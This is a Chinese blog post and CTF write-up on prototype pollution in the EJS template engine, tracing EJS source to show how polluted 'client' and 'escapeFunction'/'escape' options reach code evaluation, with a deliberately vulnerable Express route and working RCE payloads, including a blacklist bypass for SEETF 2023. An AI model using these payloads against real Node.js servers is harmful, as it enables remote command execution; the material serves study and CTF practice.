ejs默认配置 原型链污染

已于 2024-01-06 23:29:06 修改
阅读量1.1k 收藏 25
点赞数 23
分类专栏: 原型链污染 文章标签: 安全 web安全 学习 node.js
于 2024-01-06 18:06:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73512445/article/details/135429921
版权

文章目录

ejs默认配置 造成原型链污染

参考文章

漏洞背景

EJS维护者对原型链污染的问题有着很好的理解,并使用非常安全的函数清理他们创建的每个对象

利用Render()

exports.render = function (template, d, o) {
    var data = d || utils.createNullProtoObjWherePossible();
    var opts = o || utils.createNullProtoObjWherePossible();

    // No options object -- if there are optiony names
    // in the data, copy them to options
    if (arguments.length == 2) {
        utils.shallowCopyFromList(opts, data, _OPTS_PASSABLE_WITH_DATA);
    }

    return handleCache(opts, template)(data);
};

以及createNullProtoObjWherePossible()

exports.createNullProtoObjWherePossible = (function () {
    if (typeof Object.create == 'function') {
        return function () {
            return Object.create(null);
        };
    }
    if (!({__proto__: null} instanceof Object)) {
        return function () {
            return {__proto__: null};
        };
    }

    // Not possible, just pass through
    return function () {
        return {};
    };
})();

参考文章是这么说的,分析上述代码,可以知道不能滥用原型链污染库内新创建的对象。因此,对于用户提供的对象来说情况并非如此,从 EJS 维护者的角度来看,用户向库提供的输入不是 EJS 的责任。

如何理解呢,就是说我们提供的可以被污染的对象并不会遭到上述函数清理。

漏洞分析

渲染模板时ejs 动态创建函数,该函数将使用传递给它的数据组装模板。该函数是根据模板动态创建的字符串编译的。所有这些都发生在最终被调用的 Template 类的编译函数中,在这种情况下,当创建模板对象时,将使用受感染的选项。

exports.compile = function compile(template, opts) {
    var templ;

    ...

    templ = new Template(template, opts);
    return templ.compile();
};

现在我们知道可以控制配置对象的原型后,那么就可以进一步利用

在这里插入图片描述

我们已经知道当编译模板时,它会使用多个配置元素来处理模板中的代码片段,并将其转换为可执行的 JavaScript 函数。这些配置元素可能包括模板标签、控制流语句、输出语句等。不过其中大多数都使用_JS_IDENTIFIER 正则表达式进行清理

在这里插入图片描述

但是并不意味着所有都会被正则清理,我们看向下面代码

compile: function () {
    /** @type {string} */
    var src;
    /** @type {ClientFunction} */
    var fn;
    var opts = this.opts;
    var prepended = '';
    var appended = '';
    /** @type {EscapeCallback} */
    var escapeFn = opts.escapeFunction;
    /** @type {FunctionConstructor} */
    var ctor;
    /** @type {string} */
    var sanitizedFilename = opts.filename ? JSON.stringify(opts.filename) : 'undefined';

    ...

    if (opts.client) {
      src = 'escapeFn = escapeFn || ' + escapeFn.toString() + ';' + '\n' + src;
      if (opts.compileDebug) {
        src = 'rethrow = rethrow || ' + rethrow.toString() + ';' + '\n' + src;
      }
    }

    ...

    return returnedFn;

我们可以知道将opts.escapeFunction赋值给escapeFn,如果opts.client存在,那么escapeFn就会在函数体内从而被调用

由于 opts.client 和 opts.escapeFunction 默认情况下未设置,因此可以原型链污染它们到达eval接收器并实现RCE

{
    "__proto__": {
        "client": 1,
        "escapeFunction": "JSON.stringify; process.mainModule.require('child_process').exec('calc')"
    }
}

漏洞利用

// Setup app
const express = require("express");
const app  = express();
const port = 3000;

// Select ejs templating library
app.set('view engine', 'ejs');

// Routes
app.get("/", (req, res) => {
    res.render("index");
})

app.get("/vuln", (req, res) => {
    // simulate SSPP vulnerability
    var a = req.query.a;
    var b = req.query.b;
    var c = req.query.c;

    var obj = {};
    obj[a][b] = c;

    res.send("OK!");
})

// Start app
app.listen(port, () => {
    console.log(`App listening on port ${port}`)
})

GET传参payload

第一次: /vuln?a=__proto__&b=escapeFunction&c=JSON.stringify; process.mainModule.require('child_process').exec('calc')
第二次: /vuln?a=__proto__&b=client&c=true

在这里插入图片描述

例题 [SEETF 2023]Express JavaScript Security

源码

const express = require('express');
const ejs = require('ejs');

const app = express();

app.set('view engine', 'ejs');

const BLACKLIST = [
    "outputFunctionName",
    "escapeFunction",
    "localsName",
    "destructuredLocals"
]

app.get('/', (req, res) => {
    return res.render('index');
});

app.get('/greet', (req, res) => {
    
    const data = JSON.stringify(req.query);

    if (BLACKLIST.find((item) => data.includes(item))) {
        return res.status(400).send('Can you not?');
    }

    return res.render('greet', {
        ...JSON.parse(data),
        cache: false
    });
});

app.listen(3000, () => {
    console.log('Server listening on port 3000')
})

分析一下,app.set('view engine', 'ejs');说明ejs模板是默认配置,在/greet路由下,接收GET参数并赋值给data变量,然后黑名单检测,调用ejs模板进行渲染其中解析data的json数据,说明ejs配置可控。

我们前文利用的payload是有escapeFunction关键字的,并且污染的过程是我们手动添加/vuln上去的,所以我们要寻找可以利用的地方

通常情况下,ejs模板只允许在数据对象中传递以下相对无害的选项

var _OPTS_PASSABLE_WITH_DATA = ['delimiter', 'scope', 'context', 'debug', 'compileDebug',
  'client', '_with', 'rmWhitespace', 'strict', 'filename', 'async'];
// We don't allow 'cache' option to be passed in the data obj for
// the normal `render` call, but this is where Express 2 & 3 put it
// so we make an exception for `renderFile`
var _OPTS_PASSABLE_WITH_DATA_EXPRESS = _OPTS_PASSABLE_WITH_DATA.concat('cache');

但是我们找到settings['view options']可用于将任意选项传递给EJS,这将是我们利用的点

跟进一下,会调用shallowCopy()进行赋值给opts

viewOpts = data.settings['view options'];
if (viewOpts) {
  utils.shallowCopy(opts, viewOpts);
}

而在渲染模板的时候会跟进到Template类中,发现关键语句

options.escapeFunction = opts.escape || opts.escapeFunction || utils.escapeXML;

也就是说虽然escapeFunction被过滤了,但是我们可以利用opts.escape去替换

settings['view options'][escape]=...

将前文漏洞利用的payload稍加修改一下,然后添加上greet.ejs中的三个配置参数

在这里插入图片描述

得到最终payload

/greet?name=test&font=test&fontSize=test&settings[view options][escape]=function(){return process.mainModule.require('child_process').execSync('/readflag')}&settings[view options][client]=1

注:题目源码已经JSON.stringify了,/readflag可以在dockerfile中得到信息

在这里插入图片描述

_rev1ve
关注
  • 23
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
EJS-BlogWebsite
04-13
EJS BLOG挑战 挑战赛设置 - Download Starting File and Move to Root Directory - Open App.js in VScode and expand folders - Styles are already configured - Ignore the .DS_Store Files - Header/Footer already have code and will be added via EJS partials - App.js has the require consts already added - Content is already specified - Const app has been declated - View Engine for EJS has been configured - BodyPa
exercise-ejs-express
04-16
完成我的网站 我们将在此网页中介绍一些新的端点和功能。 1.出生年份不详 请注意,吉祥物的出生年份不见了。 修复index.ejs也包括此信息。 尝试了解EJS如何迭代数组并从每个元素收集信息。 2.缺少页脚 主页和关于页面中都缺少页脚。 您必须创建一个新的footer.ejs。 您还必须同时修改about.ejs和index.ejs页面。 看一看那些页面如何包含header.ejs和head.ejs局部。 案文并没有真正的意义; 选择您所选择的之一。 3.新表格页面 使用模板语法创建一个新页面。 我们需要一个表格将新的吉祥物发送到我们的服务器; 因此它显示在主页中。 将您的文件写入views / pages / form.ejs。 当用户导航到/ add-mascot时,必须呈现此页面。 添加一个新的导航链接。 我们需要此表格来: 从用户那里获得新吉祥物的名称,组织和年份。 在
ARM926EJS FreeRTOS移植KEIL GCC.zip
11-09
移植到ARM9 ARM926EJS架构的FreeRTOS, 包含KEIL GCC, 测试通过
Nodejs+express+ejs简单使用实例代码
10-19
本篇文章主要介绍了Nodejs+express+ejs简单使用实例代码,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
Project-JobsCalc-Node-Ejs
04-17
| | | :rocket: 技术 该项目是使用以下技术开发的: HTML CSS JavaScript 节点JS EJS 表示 SQLite的 :laptop: 项目 JobsCalc是用于自由项目的计算估算应用程序,您可以在其中注册和删除作业(项目),从而获得每个作业的成本估算。 另外,可以追踪将要使用该系统的人的小时价值 :money_bag: :bookmark: 布局 您可以通过查看项目的布局。 必须具有帐户才能访问它。 :memo: 执照 该项目已获得MIT许可。 有关更多详细信息,请参见文件。 完成与 :heart_suit: 通过Rocketseat :waving_hand: 加入我们的社区!
原型链污染漏洞案例实战二
weixin_51525416的博客
08-05 3461
在server.js代码中: merge 首先需要传参body进行原型链污染,其污染的对象是sourceURL。用户提交的信息,用merge方法合并到session里,多次提交,session里最终保存你提交的所有信息。获取flag的条件是 传入的querytoken要和user数组本身的admintoken的MD5值相等,且二者都要存在。merge 函数作用是进行对象的合并,其中涉及到了对象的赋值,且键值可控,这样就可以触发原形链污染了。这个属性原本是没有赋值的,默认取空字符串。获取flag的条件是。
原型链污染及Race漏洞
Mr_Rongyao的博客
08-03 99
通俗点说:原型链污染就是一个函数下的一个实例对象对该函数的原型进行了修改,然后让该函数下的其他对象访问这个函数时,就都会得到被修改后的原型对象。例// foo是一个简单的JavaScript对象 let foo = {
浅谈 Nodejs原型链污染
weixin_63231007的博客
03-07 1092
nodejs原型链污染原理及利用
原型链污染以及Code-Breaking 2018 Thejs复现
xk2844600795的博客
08-03 247
在JavaScript发展历史上,很少有真正的私有属性,类的所有属性都允许被公开的访问和修改,包括proto,构造函数和原型。攻击者可以通过注入其他值来覆盖或污染这些proto,构造函数和原型属性。然后,所有继承了被污染原型的对象都会受到影响。原型链污染通常会导致拒绝服务、篡改程序执行流程、导致远程执行代码等漏洞。以下是一个简单的原型链污染的代码,可以方便我们理解我们调试一下这段js代码。
详解nodejs 配置文件处理方案
01-02
前言 一般来说:一个好的项目配置应该满足以下条件: 依赖环境:配置根据具体运行环境从相应的文件读取 代码分离:配置项不仅可以从配置文件读取, 也可以从环境变量读取,使得安全隐秘的配置项与代码分离 易于使用:配置项应该是分层配置的,有助于查找条目和维护庞大的配置文件的,应该是容易组织和容易获取的,比如json结构 在多人开发 nodejs 项目的时候,没有规划好配置方案,配置文件的问题就很容易暴露出来。 痛点 在开发 nodejs 的工程中,遇到过三个痛点 部署环境不同: 开发、测试、生产环境的不同,导致配置的不同 开发环境不同: 开发者的开发环境配置不同,会存在同一个配
rollup-plugin-emit-ejs:通过汇总从ejs发射文件
02-15
汇总插件emit-ejs 此插件使您可以将文件从ejs模板发射到汇总捆绑包。 它主要用于发出html文件,因为它可以帮助您链接捆绑的javascript /样式表,并包括基本的布局系统,但是它可以处理任何文件类型。 与,此插件使用插件上下文方法,该方法允许其他插件(如处理发出的文件。 安装 yarn add rollup-plugin-emit-ejs --dev 或者 npm install rollup-plugin-emit-ejs -D 用法 // rollup.config.js import emitEJS from 'rollup-plugin-emit-ejs' export default { // ... plugins : [ emitEJS ( { src : 'src' , layout : 'src/layout.
修改Nodejs内置的npm默认配置路径方法
01-02
Nodejs 内置的npm默认会把模块安装在c盘的用户AppData目录下(吐槽一下:不明白为啥现在的软件都喜欢把资源装在这里) C盘这么小,肯定是不行的,下面一步步修改到D盘 1.打开cmd命令行,查看当前配置 输入 npm config ls 先看一下当前npm的配置环境,由于我已经修改过,所以可以看到修改后的路径 2.修改路径 这里需要修改两个路径,module路径和cache路径 module对应prefix cache对应cache 首先在别的盘新建两个目录 D:\nodejs\node_modules\npm\node_global_modules D:\nodejs\nod
node-ejs-blog
04-13
节点ejs博客 在app.js中为Mongodb连接设置UserName和Password(在开发中使用mongodb Atlas)
ejs-compiled-loader:用于Webpack的EJS加载器(无前端依赖项)
02-06
用于webpack的ejs-compiled-loader 用于EJS加载器。 使用函数来编译模板。 要使用使用1.x分支和1.xx版本。 安装 npm install ejs-compiled-loader 用法 var template = require ( "ejs-compiled-loader!./file.ejs" ) ; // => returns the template function compiled with ejs templating engine. // And then use it somewhere in your code template ( d
原型链污染
最新发布
m0_62389190的博客
08-05 51
可以进行功能测试[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-s0tluGQi-1691235128302)(C:\Users\寒烟悟\AppData\Roaming\Typora\typora-user-images\image-20230805160214202.png)]以上代码简单逻辑就是用户提交的信息,用merge方法合并到session里,多次提交,session里最终保存你提交的所有信息。在上述的功能测试那一块有体现。这个属性原本是没有赋值的,默认取空字符串。
从 [GYCTF2020]Node Game 了解 nodejs HTTP拆分攻击
ShenZ的博客
08-29 931
nodejs HTTP拆分攻击 nodejs 8.12 Node.js API 文档 当 Node.js 使用 http.get 向特定路径发出HTTP 请求时,发出的请求实际上被定向到了不一样的路径,这是因为NodeJS 中 Unicode 字符损坏导致的 HTTP 拆分攻击 原理 Unicode原理 对于不包含主体的请求,Node.js默认使用“latin1”,这是一种单字节编码字符集,不能表示高编号的Unicode字符,例如????这个表情。所以,当我们的请求路径中含有多字节编码的Unico
几道nodejs题目的分析
stepone4ward的博客
04-01 2335
三道原型链污染,一道拆分请求攻击
前端知识点整理收集(不定时更新~)
理智lili的博客
11-02 2153
知识点都是搜集各种大佬们的,如有冒犯,请告知! 目录 原型链 New关键字的执行过程 ES6——class constructor方法 类的实例对象 不存在变量提升 super 关键字 ES6——...(展开/收集)运算符 面向对象的理解 关于this对象 箭头函数 匿名函数 闭包 内存泄露 JavaScript垃圾回收机制 引用计数算法 循环引用...
ejs include
05-21
EJS(Embedded JavaScript)是一种基于JavaScript的模板引擎,可以用来生成HTML、XML等文档。EJS提供了一种简单的方式来将数据嵌入到HTML页面中。其中,include指令用于在EJS模板中引入其他模板文件。 使用include指令,需要在模板中使用以下语法: ``` <% include path/to/other/template.ejs %> ``` 其中,path/to/other/template.ejs是要引入的模板文件的路径。注意,在使用include指令时,被引入的模板文件中不应该包含任何与当前模板文件相同的变量或函数,否则可能会导致冲突。 需要注意的是,EJS并没有内置的include功能,而是通过在模板中定义一个自定义的include函数来实现的。因此,在使用include指令之前,需要在程序中定义这个函数。下面是一个例子: ``` const ejs = require('ejs'); const fs = require('fs'); ejs.filters.include = function (path) { const file = fs.readFileSync(path, 'utf8'); return ejs.render(file, this); }; const template = ` <html> <head> <title>Example</title> </head> <body> <% include path/to/other/template.ejs %> </body> </html>`; const data = { name: 'John' }; const output = ejs.render(template, data); console.log(output); ``` 在上面的例子中,我们首先定义了一个自定义的include函数,然后在模板中使用include指令来引入其他模板文件。当渲染模板时,EJS会自动调用include函数来处理这些指令,并将被引入的模板文件和当前模板文件的数据合并起来生成最终的HTML输出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_rev1ve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值